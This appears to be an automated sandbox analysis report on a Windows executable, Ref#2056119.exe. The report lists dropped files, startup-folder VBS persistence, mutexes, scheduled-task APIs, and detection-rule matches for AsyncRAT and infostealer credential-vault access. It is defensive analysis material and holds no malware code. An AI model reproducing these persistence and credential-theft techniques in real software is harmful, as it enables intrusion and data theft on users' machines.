Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0133F3A8	0_2_0133F3A8
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_064F0006	0_2_064F0006
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_070A1200	0_2_070A1200
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_070A22B3	0_2_070A22B3
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_070A22C0	0_2_070A22C0
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_070A2840	0_2_070A2840
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_071435E8	0_2_071435E8
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0714B9C8	0_2_0714B9C8
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_071465AA	0_2_071465AA
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_071435D8	0_2_071435D8
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07142330	0_2_07142330
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07142340	0_2_07142340
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0714CA38	0_2_0714CA38
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0714CA48	0_2_0714CA48
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0714392A	0_2_0714392A
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_071559B0	0_2_071559B0
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0715A505	0_2_0715A505
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_071563BF	0_2_071563BF
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_071563D0	0_2_071563D0
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_071559A0	0_2_071559A0
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07150040	0_2_07150040
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0715F898	0_2_0715F898
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0715F888	0_2_0715F888
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07173798	0_2_07173798
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_071767DB	0_2_071767DB
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07174E48	0_2_07174E48
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0717BBD8	0_2_0717BBD8
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0717BBC8	0_2_0717BBC8
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0717A9D8	0_2_0717A9D8
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0717A9E8	0_2_0717A9E8
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0717001D	0_2_0717001D
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07170040	0_2_07170040
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07430040	0_2_07430040
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07430367	0_2_07430367
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07431248	0_2_07431248
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_074B2F30	0_2_074B2F30
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_074BB0F0	0_2_074BB0F0
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_074B2F20	0_2_074B2F20
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_074BE218	0_2_074BE218
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_074BE1B9	0_2_074BE1B9
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_074BB0E0	0_2_074BB0E0
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_075A0040	0_2_075A0040
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_075A0013	0_2_075A0013
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_0091CB14	4_2_0091CB14
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_0091F3B8	4_2_0091F3B8
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_0091F3A8	4_2_0091F3A8
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D43DC8	4_2_05D43DC8
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D4BF56	4_2_05D4BF56
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D43307	4_2_05D43307
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D43DB8	4_2_05D43DB8
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D43442	4_2_05D43442
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D4CF58	4_2_05D4CF58
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D4CF48	4_2_05D4CF48
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D4338C	4_2_05D4338C
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D42B48	4_2_05D42B48
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D42B38	4_2_05D42B38
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D4333B	4_2_05D4333B
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D44291	4_2_05D44291
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D43278	4_2_05D43278
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D43268	4_2_05D43268
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D603C8	4_2_05D603C8
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D615E0	4_2_05D615E0
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D606FF	4_2_05D606FF
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8A490	4_2_05D8A490
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D806B8	4_2_05D806B8
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D859E0	4_2_05D859E0
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D89820	4_2_05D89820
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8A480	4_2_05D8A480
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D846E8	4_2_05D846E8
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8FE62	4_2_05D8FE62
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8F9D0	4_2_05D8F9D0
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8F9E0	4_2_05D8F9E0
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8A84C	4_2_05D8A84C
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D89811	4_2_05D89811
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8BB4F	4_2_05D8BB4F
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8FB6D	4_2_05D8FB6D
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8FAB3	4_2_05D8FAB3
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8FAB6	4_2_05D8FAB6
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D87A54	4_2_05D87A54
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8FA54	4_2_05D8FA54
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D87A60	4_2_05D87A60
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_067CF160	4_2_067CF160
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_067C0DB0	4_2_067C0DB0
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_067C0DA3	4_2_067C0DA3
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_067C1233	4_2_067C1233
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_067C12D8	4_2_067C12D8
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_067C1328	4_2_067C1328
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_0680B640	4_2_0680B640
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06805B78	4_2_06805B78
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_068048A8	4_2_068048A8
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_068074EB	4_2_068074EB
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06801223	4_2_06801223
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_0680B62F	4_2_0680B62F
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06801230	4_2_06801230
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06804898	4_2_06804898
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06809819	4_2_06809819
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06A2B460	4_2_06A2B460
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06A26C40	4_2_06A26C40
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06A24988	4_2_06A24988
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06A26C3A	4_2_06A26C3A
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06A2B450	4_2_06A2B450
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06A2E5F0	4_2_06A2E5F0
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06A26DC3	4_2_06A26DC3
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06A2D910	4_2_06A2D910
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06C7E750	4_2_06C7E750
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06C60040	4_2_06C60040
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_06C60007	4_2_06C60007
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_0129E508	5_2_0129E508
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_0129D990	5_2_0129D990
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_0129AA12	5_2_0129AA12
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_01294A98	5_2_01294A98
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_01293E80	5_2_01293E80
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_012941C8	5_2_012941C8
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_01294A8E	5_2_01294A8E
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_01293E74	5_2_01293E74
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B36668	5_2_06B36668
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B35640	5_2_06B35640
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B37DF0	5_2_06B37DF0
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B3B2A3	5_2_06B3B2A3
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B3C200	5_2_06B3C200
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B33100	5_2_06B33100
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B37710	5_2_06B37710
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B3E418	5_2_06B3E418
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B32409	5_2_06B32409
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B35D5F	5_2_06B35D5F
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B30040	5_2_06B30040
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 5_2_06B30006	5_2_06B30006
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_017DCB14	7_2_017DCB14
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_017DF3B8	7_2_017DF3B8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_017DF3A8	7_2_017DF3A8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_06E298B0	7_2_06E298B0
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_06E2C9D8	7_2_06E2C9D8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_06E2C978	7_2_06E2C978
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_06E298A0	7_2_06E298A0
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_06E2F9C1	7_2_06E2F9C1
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_06E2F9D0	7_2_06E2F9D0
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_073F09F8	7_2_073F09F8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_073F1EB8	7_2_073F1EB8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_073F1EAA	7_2_073F1EAA
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_073F2438	7_2_073F2438
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074859B0	7_2_074859B0
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_0748A505	7_2_0748A505
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074863D0	7_2_074863D0
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074863BF	7_2_074863BF
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_0748EA09	7_2_0748EA09
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074859A0	7_2_074859A0
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_07480040	7_2_07480040
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074935E8	7_2_074935E8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_0749B9C8	7_2_0749B9C8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074935D8	7_2_074935D8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074965AA	7_2_074965AA
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_07492340	7_2_07492340
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_07492330	7_2_07492330
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_0749CA48	7_2_0749CA48
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_0749CA38	7_2_0749CA38
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_0749392A	7_2_0749392A
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074C67DB	7_2_074C67DB
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074C3798	7_2_074C3798
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074C4E38	7_2_074C4E38
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074CBBC8	7_2_074CBBC8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074CBBD8	7_2_074CBBD8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074CA9D8	7_2_074CA9D8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074CA9E8	7_2_074CA9E8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074C0040	7_2_074C0040
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_074C0006	7_2_074C0006
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_07700040	7_2_07700040
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_07700367	7_2_07700367
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_07701248	7_2_07701248
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_078F0007	7_2_078F0007
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 7_2_078F0040	7_2_078F0040
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 8_2_01381680	8_2_01381680
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_013B41C8	12_2_013B41C8
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_013BE280	12_2_013BE280
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_013BAA18	12_2_013BAA18
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_013B4A98	12_2_013B4A98
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_013B3E80	12_2_013B3E80
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_06B66668	12_2_06B66668
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_06B65640	12_2_06B65640
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_06B62418	12_2_06B62418
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_06B67DF0	12_2_06B67DF0
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_06B6B2B0	12_2_06B6B2B0
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_06B6C200	12_2_06B6C200
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_06B67710	12_2_06B67710
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_06B6E418	12_2_06B6E418
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_06B65D70	12_2_06B65D70
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_06B60040	12_2_06B60040
Source: C:\Users\user\AppData\Roaming\ishon.exe	Code function: 12_2_06B60006	12_2_06B60006

Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 932

Source: Ref#2056119.exe

Static PE information: invalid certificate

Source: Ref#2056119.exe, 00000000.00000002.2030087377.000000000108E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004082000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000000.00000002.2058549679.0000000007440000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000000.00000002.2059133094.0000000007680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLiphk vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004149000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000000.00000002.2053393935.0000000006F30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameZtyrhxmwj.dll" vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLiphmahu.exeF vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000005.00000002.3109582499.000000000041F000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#2056119.exe
Source: Ref#2056119.exe, 00000005.00000002.3110409320.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Ref#2056119.exe

Source: Ref#2056119.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 8.2.Liphmahu.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.Liphmahu.exe.25f81a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.Liphmahu.exe.25f81a0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.Ref#2056119.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Ref#2056119.exe.3f8cd58.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.ishon.exe.43fe2e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.ishon.exe.43fe2e0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Ref#2056119.exe.3f8cd58.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000008.00000002.3109582583.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: Ref#2056119.exe, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Liphmahu.exe.0.dr, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: ishon.exe.0.dr, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Ref#2056119.exe.40d0d40.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@13/4@2/3

Source: C:\Users\user\Desktop\Ref#2056119.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ishon.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Mutant created: \Sessions\1\BaseNamedObjects\qnzzEC3SI3U6Qmbo
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:64:WilError_03

Source: C:\Users\user\Desktop\Ref#2056119.exe

File created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs"

Source: Ref#2056119.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Ref#2056119.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Ref#2056119.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
